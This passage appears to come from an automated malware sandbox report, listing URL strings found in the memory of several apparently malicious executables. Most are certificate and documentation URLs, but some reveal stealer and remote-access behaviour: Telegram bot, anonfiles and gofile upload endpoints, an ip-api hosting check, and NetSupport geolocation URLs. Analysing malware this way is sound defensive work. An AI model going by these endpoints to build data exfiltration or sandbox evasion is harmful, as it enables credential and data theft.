                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                                Source: D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                Source: D1UL0FG.exe, 00000006.00000003.2479810118.000001FA2E00B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                                Source: FuturreApp.exe, 00000055.00000002.7280001721.0000000001011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp.
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp?_8
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspM
                                Source: FuturreApp.exe, 00000055.00000002.7280001721.000000000102A000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000003.4653304717.000000000102A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSO#v
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspS_T
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: FuturreApp.exe, 00000055.00000003.4653304717.0000000001011000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7280001721.0000000001011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspt
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2491071209.000001FA2E339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr=
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr=r
                                Source: powershell.exe, 00000011.00000002.2798190076.0000028A95663000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA472A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA45E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get_Py_hashtable_hash_ptr_Py_hashtable_new_Py_hashtable_new_full_Py
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0$
                                Source: D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigor
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                                Source: powershell.exe, 00000011.00000002.2659507683.0000028A8581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: powershell.exe, 00000011.00000002.2659507683.0000028A855F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F94571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000011.00000002.2659507683.0000028A8581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                Source: 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                                Source: 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                                Source: D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F95CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: D1UL0FG.exe, 00000006.00000003.2483191115.000001FA2E348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                Source: D1UL0FG.exe, 00000006.00000002.2994686115.000001FA2E595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftISPLA~1.PNGy./
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: D1UL0FG.exe, 00000006.00000003.2483191115.000001FA2E348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                                Source: powershell.exe, 00000011.00000002.2659507683.0000028A855F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F94571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadrV
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr=
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr=r
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s)
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
